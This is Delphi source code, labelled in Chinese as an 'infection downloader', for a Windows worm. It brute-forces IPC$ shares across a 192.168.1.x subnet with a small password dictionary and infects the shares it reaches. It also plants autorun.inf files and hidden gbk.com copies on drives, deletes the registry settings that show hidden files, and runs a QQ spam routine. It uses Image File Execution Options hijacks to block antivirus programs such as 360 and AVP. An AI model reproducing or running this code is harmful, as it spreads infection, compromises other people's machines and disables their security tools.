cttt.pas

感染下载者源码 感染下载者源码 感染下载者源码

    BRes: Boolean;
begin
  Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  BRes := GetVersionEx(Ver);
  if not BRes then
  begin
    Result := False;
    Exit;
  end else
    Result := True;
  case Ver.dwPlatformId of
    VER_PLATFORM_WIN32_NT      : Value := True;
    VER_PLATFORM_WIN32_WINDOWS : Value := False;
    VER_PLATFORM_WIN32s        : Result := False;
  end;
end;
//根据计算机名获取对方IP地址函数
function GetIP(Name:string) : string;
type
TaPInAddr = array [0..10] of PInAddr;
PaPInAddr = ^TaPInAddr;
var
phe :PHostEnt;
pptr : PaPInAddr;
I : Integer;
GInitData : TWSADATA;
begin
  WSAStartup($101, GInitData);
  Result := '';
  phe :=GetHostByName(pchar(Name));
  pptr := PaPInAddr(Phe^.h_addr_list);
  result:=StrPas(inet_ntoa(pptr^[0]^));
  WSACleanup;
end;
//返回IP段前3节
function Extractip(ips: string): string;
begin
  Result := '';
  while (Pos('.', ips) <> 0) do
  begin
    Result := Result + Copy(ips, 1, 1);
    Delete(ips, 1, 1);
  end;
end;
//枚举共享
procedure netshare;
//定义字典内容 我删除了点
const
   suse_pass:array[1..4,   1..2]   of   string   =   (('administrator',''),('new',''),('admistrator','123456'),('',''));
var
  i,j,q:Integer;
  FLibHandle : THandle;
  ShareNT : PShareInfo2Array;
  entriesread,totalentries:DWORD;
  Share : array [0..512] of TShareInfo50;
  pcEntriesRead,pcTotalAvail:Word;
  OS: Boolean;
  NR: tNETRESOURCE;
  Ret: DWORD;
  cip:string;
begin
//得到本机IP段  下面就扫描了  可以把那个段换成 这个CIP这个变量
//既然你是学习的  方法下面是示范
  cip:=extractip(getip(getcname));
  if not IsNT(OS) then exit;
  for j:=2 to 254 do      //扫描IP段的IPC$连接
  begin
    WNetCancelConnection2(pchar('192.168.1.'+inttostr(j)+'\ipc$'), 0, TRUE);
    NR.dwType := RESOURCETYPE_ANY;
    nr.dwDisplayType := RESOURCEDISPLAYTYPE_SERVER;
    nr.dwScope := RESOURCE_CONNECTED;

    NR.lpLocalName := nil;
    NR.lpRemoteName := PChar('192.168.1.'+inttostr(j)+'\ipc$');
    NR.lpProvider := nil;
    for q:=1 to 4 do          //密码连接
    begin
      Ret := WNetAddConnection2(NR,pchar(suse_pass[q][1]),pchar(suse_pass[q][2]),CONNECT_UPDATE_PROFILE);
      if Ret = NO_ERROR then       //成功调用枚举共享
      begin
      if OS then begin
        FLibHandle := LoadLibrary('NETAPI32.DLL');
        if FLibHandle = 0 then Exit;
        @NetShareEnumNT := GetProcAddress(FLibHandle,'NetShareEnum');
        if not Assigned(NetShareEnumNT) then
        begin
          FreeLibrary(FLibHandle);
          Exit;
        end;
        ShareNT := nil;
        //以建立的IPC$密码枚举 ，IP地址用上面的 变量  我这里是定死的 怕他传染太厉害

        if NetShareEnumNT('192.168.1.100',2,@ShareNT,DWORD(-1),
                 @entriesread,@totalentries,nil) <> 0 then
        begin
          FreeLibrary(FLibHandle);
          Exit;
        end;
        if entriesread > 0 then
        for i:= 0 to entriesread - 1 do   //得到共享 下面调用感染目录函数
          kfile('\\192.168.1.100\'+String(ShareNT^[i].shi2_netname),fff2);
      end else begin
        FLibHandle := LoadLibrary('SVRAPI.DLL');
        if FLibHandle = 0 then Exit;
        @NetShareEnum := GetProcAddress(FLibHandle,'NetShareEnum');
        if not Assigned(NetShareEnum) then
        begin
          FreeLibrary(FLibHandle);
          Exit;
        end;
        if NetShareEnum(nil,50,@Share,SizeOf(Share),
                @pcEntriesRead,@pcTotalAvail) <> 0 then
        begin
          FreeLibrary(FLibHandle);
          Exit;
        end;
        if pcEntriesRead > 0 then
        for i:= 0 to pcEntriesRead - 1 do
    //      lbxShares.Items.Add(String(Share[i].shi50_netname));
      end;
      FreeLibrary(FLibHandle);
      break;
      end;
    end;
  end;
end;
//新线程过程
procedure killwebPro(); stdcall;
begin
  kfile('c:\',fff2);
  kfile('d:\',fff2);
  kfile('e:\',fff2);
  netshare;
  FreeLibraryAndExitThread(subid, 0);
end;
//QQ尾巴过程
procedure qqProc(Wnd:HWnd;Msg,TimerID,dwTime:DWORD);stdcall;
begin
    qqtext(qqms);
end;
//写INF文件
procedure writeini(fpath:string);
var
mm:textfile;
begin
try
   assignfile(mm,fPath);
   rewrite(mm);
   writeln(mm,'[AutoRun]');
   writeln(mm,'open=gbk.com');
   writeln(mm,'shell\Auto\command=gbk.com');
   writeln(mm,'shellexecute=gbk.com');
   closefile(mm);
   except
   end;
end;
//写启动过程
Procedure chtrun;
var
SysPath:String;
hTemp: HKEY;
begin
SysPath:=getwinsys(1) + 'Temp\~tmp83.tmp';
CopyFile(pchar(SysPath),Pchar(getwinsys(1) +'debug\debug.exe'),true);
CopyFile(Pchar(getwinsys(1) +'debug\debug.exe'),pchar(SysPath),true);
CopyFile(pchar(SysPath),Pchar('c:\MSDOS.log'),False);
if CopyFile(pchar(SysPath),Pchar('d:\gbk.com'),False) then
begin
writeini('d:\autorun.inf');
filesetattr('d:\Autorun.inf',6);
filesetattr('d:\gbk.com',6);
end;
if CopyFile(pchar(ParamStr(0)),Pchar('e:\gbk.com'),False) then
begin
writeini('e:\autorun.inf');
filesetattr('e:\Autorun.inf',6);
filesetattr('e:\Autorun.com',6);
end;
//删除注册表显示文件选项  隐藏文件  
if RegOpenKeyEx(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN', 0, KEY_READ or KEY_WRITE, hTemp) = ERROR_SUCCESS then
begin
regdeletevalue(hTemp,'CheckedValue');
regdeletevalue(hTemp,'DefaultValue');
RegCloseKey(hTemp);
end;
if RegOpenKeyEx(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL', 0, KEY_READ or KEY_WRITE, hTemp) = ERROR_SUCCESS then
begin
regdeletevalue(hTemp,'CheckedValue');
regdeletevalue(hTemp,'DefaultValue');
RegCloseKey(hTemp);
end;
end;
//AV终结者的  文件映像劫持 过程
procedure ifso;
var
SysPath:String;
begin
   SysPath:=getwinsys(1)+'debug\debug.exe';
   RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conime.exe\Debugger',SysPath);
   RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe\Debugger',SysPath);